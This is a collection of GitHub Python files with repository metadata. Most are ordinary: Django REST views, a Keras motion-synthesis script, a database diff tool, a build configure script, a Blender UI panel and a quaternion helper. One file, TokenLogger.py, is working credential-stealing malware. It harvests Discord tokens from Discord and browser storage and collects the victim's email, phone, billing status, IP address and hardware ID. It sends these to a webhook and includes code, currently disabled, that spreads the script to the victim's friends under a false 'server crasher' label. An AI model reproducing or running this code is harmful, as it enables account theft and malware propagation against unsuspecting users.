984a8f251b27a89284efa37e3666730a6583cdd3
|
c5309e0b1fd39be510089568d8a1583d44b43813
|
refs/heads/main
| 2022-12-30T13:17:49.684661
| 2020-10-20T20:40:52
| 2020-10-20T20:40:52
| 303,567,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
from rest_framework import serializers
from talk.models import Post
class PostSerializer(serializers.ModelSerializer):
class Meta:
model = Post
fields = ('id', 'author', 'text', 'created', 'updated')
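# Example usage (a sketch, assuming a saved Post instance `p`):
#   PostSerializer(p).data
#   -> {'id': ..., 'author': ..., 'text': ..., 'created': ..., 'updated': ...}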
|
[
"jeffpascoe9@gmail.com"
] |
jeffpascoe9@gmail.com
|
68daa432013b8807742a5523d291653409e0d47b
|
f979d449c514b8ceb564d78e6d611ac69e782e9e
|
/synthesis_scripts/randomly_generating_sequences.py
|
67f24e804efc435ad9943f7420bca3aff9c19c1c
|
[] |
no_license
|
lucaskingjade/Motion_Synthesis_Adversarial_Learning
|
4de51fe2a5f1f016081883fcdff400d1a990c8f1
|
bf9d4d7a2763d80302ecc4c5a894f169106f79fd
|
refs/heads/master
| 2020-03-24T00:44:20.832630
| 2019-02-20T14:02:39
| 2019-02-20T14:02:39
| 142,305,689
| 8
| 1
| null | 2019-02-19T13:15:07
| 2018-07-25T13:42:52
|
Python
|
UTF-8
|
Python
| false
| false
| 3,813
|
py
|
# This script is used for randomly generating long sequences.
# 1. reconstruct a sequence but using different labels
import numpy as np
import os
from keras.models import model_from_yaml, Model
from Seq_AAE_V1.models.Seq_AAE.seq_aae_new_loss import *
from keras.layers import Input,RepeatVector,LSTM,SimpleRNN
def Decoder(latent_dim,max_len,hidden_dim_dec_list,activation_dec_list,dof):
latent_input = Input(shape=(latent_dim,), name='latent_input')
latent_input_seq = RepeatVector(max_len)(latent_input)
decoded = latent_input_seq
for i, (dim, activation) in enumerate(zip(hidden_dim_dec_list, activation_dec_list)):
decoded = LSTM(output_dim=dim, activation=activation, return_sequences=True)(decoded)
decoded = SimpleRNN(output_dim=dof, activation='sigmoid', name='decoder_output', return_sequences=True)(
decoded)
return Model(input=latent_input, output=decoded, name='Decoder')
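# Example (a sketch reusing the hyperparameters set on the SAAE below):
#   decoder = Decoder(latent_dim=50, max_len=1000, hidden_dim_dec_list=[100, 100],
#                     activation_dec_list=['tanh', 'tanh'], dof=69)
#   decoder.predict(latent_codes) would then return sequences of shape (n, 1000, 69)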
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--which_epoch',default=200,type=int)
parser.add_argument('--nb_test', default=100, type=int)
parser.add_argument('--which_activity', default=0, type=int)
args = parser.parse_args()
root_path = os.getenv('Seq_AAE_V1')
path_model =root_path +'Training/Seq_AAE/Expr_Emilya/exp2310/expr001/'
encoder_name='encoder'+str(args.which_epoch)
with open(path_model+encoder_name+'.yaml','r') as f:
encoder = model_from_yaml(f)
encoder.load_weights(path_model+encoder_name+'.h5')
##load some walking data from dataset
from Seq_AAE_V1.datasets.dataset import Emilya_Dataset
dataset_obj = Emilya_Dataset(window_width=200, shift_step=20,
sampling_interval=None,
with_velocity=False,
number=2, nb_valid=2, nb_test=args.nb_test)
X = dataset_obj.test_X[:,:,1:]
Y1 = dataset_obj.test_Y1
Y2 = dataset_obj.test_Y2
# only choose 'walking' activity
indices = np.where(Y1 == args.which_activity)[0]
X = X[indices]
Y1 = Y1[indices]
Y2 = Y2[indices]
max_vector = dataset_obj.max_vector[1:]
min_vector = dataset_obj.min_vector[1:]
# get the latent codes using its true emotion label
latent_codes = encoder.predict(x=X, batch_size=100)
#define decoder model
SAAE = Sequence_Adversrial_Autoencoder_with_New_Loss(latent_dim=50,latent_activation='tanh',
hidden_dim_enc_list=[100,100],hidden_dim_dec_list=[100,100],
activation_enc_list=['tanh','tanh'],activation_dec_list=['tanh','tanh'])
SAAE.nb_label =8
SAAE.max_len = 1000
SAAE.dof = 69
SAAE.postprocess = dataset_obj.postprocess
SAAE.sampling_interval = dataset_obj.sampling_interval
SAAE.save_generated_seqs(X, max_vector=max_vector, min_vector=min_vector,
suffix='true_seq_activity' + str(args.which_activity))
# decoder = Decoder(latent_dim=50,max_len=500,
# hidden_dim_dec_list=[100,100],activation_dec_list=['tanh','tanh'],dof=69)
#
# #Emotion_name = ['Anger', 'Anxiety', 'Joy', 'Neutral', 'Panic Fear', 'Pride', 'Sadness', 'Shame']
#
# #load decoder
# decoder_name = 'de'+encoder_name[2:]
# # with open(path_model+decoder_name+'.yaml','r') as f:
# # decoder = model_from_yaml(f)
# decoder.load_weights(path_model+decoder_name+'.h5')
# latent_codes = latent_codes*1.0+np.random.normal(size=latent_codes.shape,scale=1)*0.
# generated_long_seqs = decoder.predict(x=latent_codes,verbose=0)
# SAAE.save_generated_seqs(generated_long_seqs,max_vector=max_vector,min_vector=min_vector,
# suffix='random_generated_activity'+str(args.which_activity))
|
[
"wangqi531@hotmail.com"
] |
wangqi531@hotmail.com
|
fa1fb078b8bf58633cef5e892c8ca584e598673f
|
9c524827809d2b1fec6da2780ae3aaf51e441e13
|
/test/db_operate.py
|
295975e853e19a4cd17f456f439887207c9402f9
|
[] |
no_license
|
wjfelink/python_test
|
e303c513fe9cc684759ac0abfb7349547f15bff5
|
6cfdce9eedffe9ed3b2b9b9b2b2320144d00b922
|
refs/heads/master
| 2021-01-10T02:22:24.179968
| 2016-03-24T10:08:56
| 2016-03-24T10:08:56
| 53,390,781
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,148
|
py
|
__author__ = 'user'
# -*- coding:utf-8 -*-
import PyMysql_db as sqldb
#result_master_order_create
def getDiffData(table_name,sqltext1,sqltext2,primary_key='',db1='portal_0224',db2='portal_0304'):
#table_name="master_order"
#sqltext = "select * from master_order where master_order_no='20160324104026882095'"
data = sqldb.getDbData(db=db1,sqltext=sqltext1)
#sqltext = "select * from master_order where master_order_no='20160324104026477003'"
data2 = sqldb.getDbData(db=db2, sqltext=sqltext2)
print data
print data2
with open("result_master_order_create.txt", 'ab+') as result:
result.truncate()
result.write("---------------%s---------------\n"%table_name)
try:
for order in data:
primary_key_value=order[primary_key]
for key in order:
for order2 in data2:
primary_key_value2=order2[primary_key]
if primary_key_value!=primary_key_value2:
continue
for key2 in order2:
if key == key2:
if (order[key] == order2[key2]):
break
else:
print "0224-%s:"%table_name,key,order[key]
print "0304-%s:"%table_name,key2,order2[key2]
result.write(u"0224-%s: %s %s" % (table_name,key, order[key]), )
result.write(u"\n0304-%s: %s %s\n" % (table_name,key2, order2[key2]))
print "\n"
result.write(u"\n")
except:
print "error"
finally:
result.close()
if __name__ == '__main__':
table_name="order_item"
sqltext1="select * from order_item where fk_master_order_id='47e35de732534ee9846926090230be07'"
sqltext2="select * from order_item where fk_master_order_id='7cee403643714c41b10c96be0ff6fec3'"
primary_key="FK_sales_entry_id"
getDiffData(table_name,sqltext1,sqltext2,primary_key)
|
[
"wangjunfei@ctyun.cn"
] |
wangjunfei@ctyun.cn
|
2f488107c22e8000b07da516b9366295336c7b58
|
fbdb2e6fab72f53a53c931397ed41a2798004ae3
|
/src/data_api/entries/views.py
|
5e5d0ce137187fe7c9f88ec09424ecc0df57f7b4
|
[] |
no_license
|
noodlemangos/NCSU_seniordesign
|
35fb01562f75d854eae5fc6a28ff8afba6a615f1
|
4afaf513a733f3888975a1ca9cb59b27d619e1b5
|
refs/heads/master
| 2020-09-29T00:34:20.424805
| 2019-12-09T15:25:57
| 2019-12-09T15:25:57
| 226,902,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,324
|
py
|
"""
Retrieves and saves entry data objects and displays them as a list view / detail view
Referenced tutorial at: https://codeburst.io/building-an-api-with-django-rest-framework-and-class-based-views-75b369b30396
@author Will James
"""
from django.shortcuts import render
from entries.models import Entry
from rest_framework import generics
from rest_framework.response import Response
from rest_framework.reverse import reverse
from entries.serializers import EntrySerializer
from django.contrib.auth.decorators import login_required
class EntryList(generics.ListCreateAPIView):
"""
EntryList class. Uses DjangoRestFramework generics class to create/save a list view of entry data objects.
"""
queryset = Entry.objects.all()
serializer_class = EntrySerializer
def perform_create(self, serializer):
"""
Saves a new/updated entry into the database.
"""
serializer.save()
class EntryDetail(generics.RetrieveUpdateDestroyAPIView):
"""
EntryDetail class. Uses DjangoRestFramework generics class to retrieve, update, or delete a single entry data object.
"""
serializer_class = EntrySerializer
def get_queryset(self):
"""
Retrieves all of the entry data objects
:return: All of the entry data objects
"""
return Entry.objects.all()
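# Hooking these views into URLs (a hedged sketch; this repo's actual urls.py is not shown here):
#   from django.urls import path
#   urlpatterns = [
#       path('entries/', EntryList.as_view()),
#       path('entries/<int:pk>/', EntryDetail.as_view()),
#   ]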
|
[
"cjchris3@ncsu.edu"
] |
cjchris3@ncsu.edu
|
c460c2a78e7cd626bad8d36a4c26171f6186dc4b
|
7bcbf44e931d1b9bd91fb0e720156ed2d21b6d5b
|
/venv/bin/easy_install-3.6
|
d451d65c0f972a628f96c45f5ec51f608e9bef1a
|
[] |
no_license
|
melisamalala/django-pollingapp
|
0b5e1da240c698bb0a0d4552542268b5cfa5f077
|
95dfb40d36a333827c39995bba4652ce254300c5
|
refs/heads/master
| 2020-03-29T15:25:56.320727
| 2018-10-02T12:02:28
| 2018-10-02T12:02:28
| 150,062,879
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
6
|
#!/Users/melissamalala/PycharmProjects/firstdjangoproject/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
|
[
"melissamalala@gmail.com"
] |
melissamalala@gmail.com
|
f998e42a74441a4003967df75105963ecfe3bf04
|
e009a6e93ced2f308f296ea34b77409fbb27e60f
|
/TokenLogger.py
|
a12bce394def65a1f9a9f22d66c260e528687b03
|
[] |
no_license
|
1714Noodix/TokenLog-PY
|
d003a524720cad90838e44bca34934bf39ec694f
|
884787a7d7438e37c14580c9ca6bded7a5afac37
|
refs/heads/main
| 2023-05-31T05:32:07.545182
| 2021-07-13T11:00:46
| 2021-07-13T11:00:46
| 385,571,143
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,987
|
py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Noodix: https://github.com/1714Noodix/TokenLog-PY",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("PASTE WEBHOOK HERE", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
[
"noreply@github.com"
] |
1714Noodix.noreply@github.com
|
cd5a919a4d41b784e14b9250ce816871de03c480
|
e32801b4debf07340b98255eb35e2c41ba2d2bb5
|
/scripts/addons_extern/toolplus_tileable_pattern_v2/tp_ui_view.py
|
c952bec5d0ae875b9e2936a91c9e487fc6622b9a
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
JuhaW/blenderpython
|
8c7130484690339c06f85b740c2f9e595b34a9dc
|
ee7b3a9f9d8cfbea32258e7ff05c3cb485a8879a
|
refs/heads/master
| 2021-07-21T23:59:42.476215
| 2017-10-25T08:42:04
| 2017-10-25T08:42:04
| 108,861,751
| 1
| 0
| null | 2017-10-30T14:25:14
| 2017-10-30T14:25:14
| null |
UTF-8
|
Python
| false
| false
| 5,390
|
py
|
import bpy
from bpy import*
from bpy.props import *
#from . icons.icons import load_icons
class View3D_TP_Tileable_Display_Panel(bpy.types.Panel):
""""""
bl_label = "Display"
bl_idname = "View3D_TP_Tileable_Display_Panel"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_category = "TP"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout.column_flow(1)
layout.operator_context = 'INVOKE_DEFAULT'
#icons = load_icons()
#CST = icons.get("CST")
#row.label("Animation Render", icon_value=CST.icon_id)
box = layout.box().column(1)
row = box.row(1)
row.alignment = 'CENTER'
row.label("OpenGL", icon='LAMP_SPOT')
box.separator()
row = box.row(1)
row.prop(context.space_data, "show_textured_solid","Enable Textured Solid", icon = "TEXTURE_SHADED")
row = box.row(1)
row.menu("VIEW3D_MT_opengl_lights_presets", text=bpy.types.VIEW3D_MT_opengl_lights_presets.bl_label, icon = "COLLAPSEMENU")
row.operator("scene.opengl_lights_preset_add", text="", icon='ZOOMIN')
row.operator("scene.opengl_lights_preset_add", text="", icon='ZOOMOUT').remove_active = True
box.separator()
system = bpy.context.user_preferences.system
def opengl_lamp_buttons(column, lamp):
split = column.split(percentage=0.1)
split.prop(lamp, "use", text="", icon='OUTLINER_OB_LAMP' if lamp.use else 'LAMP_DATA')
col = split.column()
col.active = lamp.use
row = col.row()
row.label(text="Diffuse:")
row.prop(lamp, "diffuse_color", text="")
row = col.row()
row.label(text="Specular:")
row.prop(lamp, "specular_color", text="")
col = split.column()
col.active = lamp.use
col.prop(lamp, "direction", text="")
row = box.row(1)
p = context.scene.opengl_lights_properties
row.prop(p, "edit", "Edit OpenGL Light", icon = "LIGHTPAINT")
if(p.edit):
box.separator()
box = layout.box().column(1)
column = box.column()
split = column.split(percentage=0.1)
split.label()
split.label(text="Colors:")
split.label(text="Direction:")
lamp = system.solid_lights[0]
opengl_lamp_buttons(column, lamp)
lamp = system.solid_lights[1]
opengl_lamp_buttons(column, lamp)
lamp = system.solid_lights[2]
opengl_lamp_buttons(column, lamp)
###
box.separator()
layout.operator_context = 'INVOKE_REGION_WIN'
layout.operator_context = 'INVOKE_AREA'
box = layout.box().column(1)
row = box.row(1)
row.alignment = 'CENTER'
row.label("3D View", icon='LAMP_DATA')
box.separator()
row = box.row(1)
row.prop(context.space_data, "use_matcap", icon ="MATCAP_06")
if context.space_data.use_matcap:
box.separator()
row = box.row(1)
row.scale_y = 0.2
row.scale_x = 0.5
row.template_icon_view(context.space_data, "matcap_icon")
box.separator()
row = box.row(1)
row.prop(context.space_data.fx_settings, "use_ssao", text="AOccl", icon="MATCAP_24")
if context.space_data.fx_settings.use_ssao:
box.separator()
row = box.row(1)
row.prop(context.space_data.fx_settings.ssao, "color","")
row.prop(context.space_data.fx_settings.ssao, "factor")
row = box.row(1)
row.prop(context.space_data.fx_settings.ssao, "distance_max")
row.prop(context.space_data.fx_settings.ssao, "attenuation")
row.prop(context.space_data.fx_settings.ssao, "samples")
###
box.separator()
box = layout.box().column(1)
row = box.row(1)
row.prop(context.space_data, "show_only_render", text="Render", icon ="RESTRICT_RENDER_ON")
row.prop(context.space_data, "show_floor", text="Grid", icon ="GRID")
row = box.row(1)
row.prop(context.space_data, "show_world", "World" ,icon ="WORLD")
sub = row.row(1)
sub.scale_x = 0.335
sub.prop(context.space_data, "show_axis_x", text="X", toggle=True)
sub.prop(context.space_data, "show_axis_y", text="Y", toggle=True)
sub.prop(context.space_data, "show_axis_z", text="Z", toggle=True)
if context.space_data.show_world:
box.separator()
row = box.row(1)
row.prop(context.scene.world, "horizon_color", "")
row = box.row(1)
row.prop(context.scene.world, "exposure")
row.prop(context.scene.world, "color_range")
###
box.separator()
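# Registration is assumed to happen elsewhere in the addon (a sketch):
#   bpy.utils.register_class(View3D_TP_Tileable_Display_Panel)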
|
[
"meta.androcto1@gmail.com"
] |
meta.androcto1@gmail.com
|
ce809f4f96fdfcf68456c7602b8491471934e49b
|
e12812df28879cc051c8ca6abe1c1aa07b8bf4dc
|
/configure
|
f0666ad495223a1b883cb2f9da2f67152c447444
|
[] |
no_license
|
lhecker/libnodecc
|
714438b63ab4ed090ce60b151da73b9e5c830129
|
655953fad2cc9c20aa9daa0b22af0504bea6ff89
|
refs/heads/master
| 2021-01-02T08:20:30.073453
| 2015-11-27T14:51:23
| 2015-11-27T14:51:23
| 20,214,879
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| true
| false
| 2,889
|
#!/usr/bin/env python
import glob
import platform
import os
import subprocess
import sys
CC = os.environ.get('CC', 'cc')
script_dir = os.path.dirname(__file__)
root_dir = os.path.normpath(script_dir)
output_dir = os.path.join(os.path.abspath(root_dir), 'out')
sys.path.insert(0, os.path.join(root_dir, 'build', 'gyp', 'pylib'))
try:
import gyp
except ImportError:
print('You need to install gyp in build/gyp first. See the README.')
sys.exit(42)
def host_arch():
machine = platform.machine()
if machine == 'i386': return 'ia32'
if machine == 'x86_64': return 'x64'
if machine.startswith('arm'): return 'arm'
if machine.startswith('mips'): return 'mips'
return machine # Return as-is and hope for the best.
def compiler_version():
proc = subprocess.Popen(CC.split() + ['--version'], stdout=subprocess.PIPE)
is_clang = 'clang' in proc.communicate()[0].split('\n')[0]
proc = subprocess.Popen(CC.split() + ['-dumpversion'], stdout=subprocess.PIPE)
version = proc.communicate()[0].split('.')
version = map(int, version[:2])
version = tuple(version)
return (version, is_clang)
def run_gyp(args):
rc = gyp.main(args)
if rc != 0:
print 'Error running GYP'
sys.exit(rc)
if __name__ == '__main__':
args = sys.argv[1:]
# GYP bug.
# On msvs it will crash if it gets an absolute path.
# On Mac/make it will crash if it doesn't get an absolute path.
if sys.platform == 'win32':
args.append(os.path.join(root_dir, 'nodecc.gyp'))
common_fn = os.path.join(root_dir, 'common.gypi')
# we force vs 2010 over 2008 which would otherwise be the default for gyp
if not os.environ.get('GYP_MSVS_VERSION'):
os.environ['GYP_MSVS_VERSION'] = '2013'
else:
args.append(os.path.join(os.path.abspath(root_dir), 'nodecc.gyp'))
common_fn = os.path.join(os.path.abspath(root_dir), 'common.gypi')
if os.path.exists(common_fn):
args.extend(['-I', common_fn])
args.append('--depth=' + root_dir)
args.append('--no-duplicate-basename-check')
# There's a bug with windows which doesn't allow this feature.
if sys.platform != 'win32':
if '-f' not in args:
args.extend('-f make'.split())
if 'eclipse' not in args and 'ninja' not in args:
args.extend(['-Goutput_dir=' + output_dir])
args.extend(['--generator-output', output_dir])
(major, minor), is_clang = compiler_version()
args.append('-Dgcc_version=%d' % (10 * major + minor))
args.append('-Dclang=%d' % int(is_clang))
if not any(a.startswith('-Dhost_arch=') for a in args):
args.append('-Dhost_arch=%s' % host_arch())
if not any(a.startswith('-Dtarget_arch=') for a in args):
args.append('-Dtarget_arch=%s' % host_arch())
if not any(a.startswith('-Dlibrary=') for a in args):
args.append('-Dlibrary=static_library')
if not any(a.startswith('-Dcomponent=') for a in args):
args.append('-Dcomponent=static_library')
gyp_args = list(args)
print gyp_args
run_gyp(gyp_args)
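# Example invocations (a sketch; the flags mirror the handling above):
#   ./configure
#   ./configure -f ninja -Dtarget_arch=x64 -Dlibrary=shared_library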
|
[
"leonard@hecker.io"
] |
leonard@hecker.io
|
|
ca871f398b9f65def86a29d93fa39109a0215972
|
f5e813c5e76271ac05e5aa48d0f5deeae111f5d8
|
/Euler.py
|
380cc7fef27bd77173ea404c1043c65f2eeb0e2d
|
[] |
no_license
|
BaxterKDL/ForwardKinematics
|
a2dc6c9e2cf6c57b98ccecad8f20662ffad2edc1
|
688eca6b0fcec3716dbaa6c27b21bc7b129d3558
|
refs/heads/master
| 2021-04-29T19:50:29.273038
| 2018-02-24T21:00:26
| 2018-02-24T21:00:26
| 121,585,193
| 0
| 2
| null | 2018-02-19T20:56:42
| 2018-02-15T02:45:33
| null |
UTF-8
|
Python
| false
| false
| 645
|
py
|
import numpy as np
from Quaternion import Quaternion
class Euler:
def __init__(self, val = (0, 0, 0)):
self.x = val[0]
self.y = val[1]
self.z = val[2]
def e2q(self):
quat = Quaternion((1, 0, 0, 0))
chz = np.cos(self.z / 2.0)
shz = np.sin(self.z / 2.0)
chy = np.cos(self.y / 2.0)
shy = np.sin(self.y / 2.0)
chx = np.cos(self.x / 2.0)
shx = np.sin(self.x / 2.0)
quat.w = chz*chy*chx + shz*shy*shx
quat.x = shz*chy*chx - chz*shy*shx
quat.y = chz*shy*chx + shz*chy*shx
quat.z = chz*chy*shx - shz*shy*chx
return quat
def value(self):
return [self.x, self.y, self.z]
def display(self):
print(self.value())
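# Worked example (a sketch): with this axis ordering, Euler((0, 0, pi/2)).e2q()
# yields w = x = cos(pi/4) ~ 0.7071 and y = z = 0 -- note that the third tuple
# component feeds the chz/shz terms above.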
|
[
"noreply@github.com"
] |
BaxterKDL.noreply@github.com
|